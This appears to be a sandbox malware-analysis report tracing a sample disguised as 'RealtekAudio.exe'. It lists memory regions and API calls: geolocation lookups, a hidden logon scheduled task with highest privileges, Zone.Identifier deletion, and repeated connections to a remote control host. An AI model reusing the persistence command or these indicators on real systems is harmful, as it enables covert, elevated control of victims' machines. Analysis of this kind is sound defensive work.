System Get Time type = Local Time, time = 2018-08-10 02:09:34 (Local Time) True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x769f0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = GetUserNameW, address_out = 0x76a0157a True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 83 True 1
Fn
Data
Process #10: taskeng.exe
0 0
»
Information Value
ID #10
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {7737867F-ACDD-43AC-B745-B8B549957EED} S-1-5-21-3785418085-2572485238-895829336-1000:CRH2YWU7\EEBsYm5:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:40, Reason: Created Scheduled Job
Unmonitor End Time: 00:04:25, Reason: Self Terminated
Monitor Duration 00:02:45
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x58c
Parent PID 0x358 (Unknown)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A28
0x 2A8
0x 5E0
0x 5A0
0x 594
0x 590
0x DE4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x00187fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000190000 0x00190000 0x00191fff Pagefile Backed Memory rw True False False -
private_0x00000000001a0000 0x001a0000 0x001a0fff Private Memory rw True False False -
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory rw True False False -
pagefile_0x00000000001f0000 0x001f0000 0x002f0fff Pagefile Backed Memory r True False False -
private_0x0000000000300000 0x00300000 0x00300fff Private Memory rw True False False -
pagefile_0x0000000000310000 0x00310000 0x00310fff Pagefile Backed Memory r True False False -
private_0x0000000000340000 0x00340000 0x0043ffff Private Memory rw True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory rw True False False -
private_0x00000000004c0000 0x004c0000 0x004fffff Private Memory rw True False False -
private_0x0000000000500000 0x00500000 0x0057ffff Private Memory rw True False False -
private_0x00000000005a0000 0x005a0000 0x005affff Private Memory rw True False False -
pagefile_0x00000000005b0000 0x005b0000 0x009a2fff Pagefile Backed Memory r True False False -
private_0x00000000009e0000 0x009e0000 0x00a1ffff Private Memory rw True False False -
private_0x0000000000af0000 0x00af0000 0x00b2ffff Private Memory rw True False False -
sortdefault.nls 0x00b30000 0x00dfefff Memory Mapped File r False False False -
pagefile_0x0000000000e50000 0x00e50000 0x00f2efff Pagefile Backed Memory r True False False -
taskeng.exe 0x00f30000 0x00f5ffff Memory Mapped File rwx False False False -
pagefile_0x0000000000f60000 0x00f60000 0x01b5ffff Pagefile Backed Memory r True False False -
private_0x0000000001b80000 0x01b80000 0x01bbffff Private Memory rw True False False -
private_0x0000000001c10000 0x01c10000 0x01c4ffff Private Memory rw True False False -
private_0x0000000001d50000 0x01d50000 0x01d8ffff Private Memory rw True False False -
tschannel.dll 0x70500000 0x70507fff Memory Mapped File rwx False False False -
xmllite.dll 0x73e80000 0x73eaefff Memory Mapped File rwx False False False -
dwmapi.dll 0x73eb0000 0x73ec2fff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
rpcrtremote.dll 0x75370000 0x7537dfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Process #11: realtekaudio.exe
151 44
»
Information Value
ID #11
File Name c:\users\eebsym5\appdata\roaming\realtek\realtekaudio.exe
Command Line "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:41, Reason: Child Process
Unmonitor End Time: 00:04:27, Reason: Terminated by Timeout
Monitor Duration 00:02:46
OS Process Information
»
Information Value
PID 0xca0
Parent PID 0xbf4 (c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x CA4
0x CA8
0x CAC
0x CB8
0x CBC
0x CC0
0x CC4
0x CC8
0x CCC
0x CD0
0x CD4
0x CD8
0x CDC
0x CE0
0x CE4
0x CE8
0x D5C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory rw True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x000fffff Private Memory rw True False False -
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory rw True False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory - True False False -
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory - True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory - True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory - True False False -
private_0x0000000000150000 0x00150000 0x0015ffff Private Memory - True False False -
private_0x0000000000160000 0x00160000 0x0016ffff Private Memory - True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory rw True False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory - True False False -
l_intl.nls 0x00190000 0x00192fff Memory Mapped File r False False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory r True False False -
private_0x00000000001b0000 0x001b0000 0x002affff Private Memory rw True False False -
pagefile_0x00000000002b0000 0x002b0000 0x00377fff Pagefile Backed Memory r True False False -
private_0x0000000000380000 0x00380000 0x0047ffff Private Memory rw True False False -
private_0x0000000000480000 0x00480000 0x0051ffff Private Memory rw True False False -
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory rw True False False -
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory - True False False -
pagefile_0x0000000000540000 0x00540000 0x00541fff Pagefile Backed Memory r True False False -
sorttbls.nlp 0x00550000 0x00554fff Memory Mapped File r False False False -
private_0x0000000000560000 0x00560000 0x0059ffff Private Memory rwx True False False -
rpcss.dll 0x005a0000 0x005fbfff Memory Mapped File r False False False -
sortkey.nlp 0x005a0000 0x005e0fff Memory Mapped File r False False False -
pagefile_0x00000000005f0000 0x005f0000 0x0060ffff Pagefile Backed Memory rw True False False -
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory rw True False False -
pagefile_0x0000000000620000 0x00620000 0x00720fff Pagefile Backed Memory r True False False -
private_0x0000000000730000 0x00730000 0x007cffff Private Memory rw True False False -
private_0x0000000000730000 0x00730000 0x0073ffff Private Memory - True False False -
pagefile_0x0000000000740000 0x00740000 0x00740fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000750000 0x00750000 0x00756fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000760000 0x00760000 0x00761fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000770000 0x00770000 0x00780fff Pagefile Backed Memory r True False False -
private_0x0000000000790000 0x00790000 0x007cffff Private Memory rw True False False -
pagefile_0x00000000007d0000 0x007d0000 0x007d0fff Pagefile Backed Memory r True False False -
private_0x0000000000870000 0x00870000 0x008affff Private Memory rwx True False False -
pagefile_0x00000000008b0000 0x008b0000 0x0098efff Pagefile Backed Memory r True False False -
realtekaudio.exe 0x009f0000 0x00a2bfff Memory Mapped File rwx True True False
pagefile_0x0000000000a30000 0x00a30000 0x0162ffff Pagefile Backed Memory r True False False -
private_0x0000000001670000 0x01670000 0x0176ffff Private Memory rw True False False -
private_0x0000000001780000 0x01780000 0x0178ffff Private Memory rw True False False -
private_0x0000000001830000 0x01830000 0x0192ffff Private Memory rw True False False -
sortdefault.nls 0x01930000 0x01bfefff Memory Mapped File r False False False -
private_0x0000000001c00000 0x01c00000 0x03bfffff Private Memory rw True False False -
private_0x0000000003c00000 0x03c00000 0x03d8ffff Private Memory rw True False False -
kernelbase.dll.mui 0x03c00000 0x03cbffff Memory Mapped File rw False False False -
private_0x0000000003d50000 0x03d50000 0x03d8ffff Private Memory rw True False False -
private_0x0000000003da0000 0x03da0000 0x03e9ffff Private Memory rw True False False -
pagefile_0x0000000003ea0000 0x03ea0000 0x04292fff Pagefile Backed Memory r True False False -
private_0x0000000004320000 0x04320000 0x0441ffff Private Memory rw True False False -
private_0x0000000004440000 0x04440000 0x0453ffff Private Memory rw True False False -
private_0x00000000045a0000 0x045a0000 0x0469ffff Private Memory rw True False False -
private_0x00000000046a0000 0x046a0000 0x0479ffff Private Memory rw True False False -
private_0x0000000004800000 0x04800000 0x048fffff Private Memory rw True False False -
private_0x0000000004900000 0x04900000 0x04aaffff Private Memory rw True False False -
private_0x0000000004940000 0x04940000 0x04a3ffff Private Memory rw True False False -
private_0x0000000004a70000 0x04a70000 0x04aaffff Private Memory rw True False False -
private_0x0000000004ab0000 0x04ab0000 0x04c4ffff Private Memory rw True False False -
private_0x0000000004ab0000 0x04ab0000 0x04bbffff Private Memory rw True False False -
private_0x0000000004c10000 0x04c10000 0x04c4ffff Private Memory rw True False False -
private_0x0000000004d30000 0x04d30000 0x04e2ffff Private Memory rw True False False -
private_0x0000000004e90000 0x04e90000 0x04f8ffff Private Memory rw True False False -
system.xml.ni.dll 0x68560000 0x68a95fff Memory Mapped File rwx True False False -
system.windows.forms.dll 0x685d0000 0x68a9dfff Memory Mapped File rwx False False False -
system.windows.forms.ni.dll 0x68aa0000 0x6967dfff Memory Mapped File rwx True False False -
system.ni.dll 0x69680000 0x69e1bfff Memory Mapped File rwx True False False -
system.configuration.ni.dll 0x6bcb0000 0x6bda0fff Memory Mapped File rwx True False False -
system.drawing.ni.dll 0x6bdb0000 0x6bf37fff Memory Mapped File rwx True False False -
mscorlib.ni.dll 0x6bf40000 0x6ca37fff Memory Mapped File rwx True False False -
mscorwks.dll 0x6ca40000 0x6cfeafff Memory Mapped File rwx True False False -
system.management.ni.dll 0x6de80000 0x6df83fff Memory Mapped File rwx True False False -
shfolder.dll 0x6e010000 0x6e014fff Memory Mapped File rwx False False False -
msvcr80.dll 0x6e180000 0x6e21afff Memory Mapped File rwx False False False -
wmiutils.dll 0x6e880000 0x6e896fff Memory Mapped File rwx False False False -
wbemprox.dll 0x6ebe0000 0x6ebe9fff Memory Mapped File rwx False False False -
wbemcomn.dll 0x6f7c0000 0x6f81bfff Memory Mapped File rwx False False False -
mscorjit.dll 0x6f900000 0x6f95afff Memory Mapped File rwx True False False -
mscoreei.dll 0x6f960000 0x6f9d7fff Memory Mapped File rwx True False False -
webio.dll 0x6fcf0000 0x6fd3efff Memory Mapped File rwx False False False -
winhttp.dll 0x6fd40000 0x6fd97fff Memory Mapped File rwx False False False -
rasadhlp.dll 0x704a0000 0x704a5fff Memory Mapped File rwx False False False -
mscoree.dll 0x71de0000 0x71e29fff Memory Mapped File rwx True False False -
rasman.dll 0x725f0000 0x72604fff Memory Mapped File rwx False False False -
rasapi32.dll 0x72610000 0x72661fff Memory Mapped File rwx False False False -
rtutils.dll 0x73390000 0x7339cfff Memory Mapped File rwx False False False -
dhcpcsvc.dll 0x73670000 0x73681fff Memory Mapped File rwx False False False -
dhcpcsvc6.dll 0x73690000 0x7369cfff Memory Mapped File rwx False False False -
fwpuclnt.dll 0x736b0000 0x736e7fff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
wshtcpip.dll 0x74960000 0x74964fff Memory Mapped File rwx False False False -
credssp.dll 0x74b20000 0x74b27fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
wship6.dll 0x74e00000 0x74e05fff Memory Mapped File rwx False False False -
mswsock.dll 0x74e10000 0x74e4bfff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
bcrypt.dll 0x74f80000 0x74f96fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
rpcrtremote.dll 0x75370000 0x7537dfff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75590000 0x755b6fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
private_0x000000007ff50000 0x7ff50000 0x7ff5ffff Private Memory rwx True False False -
private_0x000000007ff60000 0x7ff60000 0x7ffaffff Private Memory rwx True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory rw True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd5fff Private Memory rw True False False -
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory rw True False False -
private_0x000000007ffd7000 0x7ffd7000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
For performance reasons, the remaining 15 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0xca4
94 42
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 3
Fn
Mutex Create mutex_name = QSR_MUTEX_QSHCFbGIqN10lIdkUq True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 2
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.config, type = file_attributes False 2
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = CRH2YWU7 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Module Map process_name = c:\users\eebsym5\appdata\roaming\realtek\realtekaudio.exe, desired_access = FILE_MAP_WRITE True 1
Fn
System Get Info type = Operating System True 2
Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Release - True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = api.ipstack.com, address_out = 198.23.101.146, 158.85.167.221 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 198.23.101.146, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 204, size_out = 204 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/49.0, access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = api.ipstack.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /check?access_key=5fe547c4ec9ffabae465e7864d212dc4&output=xml True 1
Fn
Inet Send HTTP Request headers = host: api.ipstack.com, connection: Keep-Alive, user-agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/49.0, url = api.ipstack.com/check?access_key=5fe547c4ec9ffabae465e7864d212dc4&output=xml True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 966 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 966 True 1
Fn
Data
File Delete filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe:Zone.Identifier False 1
Fn
Process Create process_name = "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f, os_pid = 0xcec, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Module Get Handle module_name = c:\users\eebsym5\appdata\roaming\realtek\realtekaudio.exe, base_address = 0x9f0000 True 2
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = 18446744073709551612, new_long = 1991594109 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = 18446744073709551612, new_long = 8850562 True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
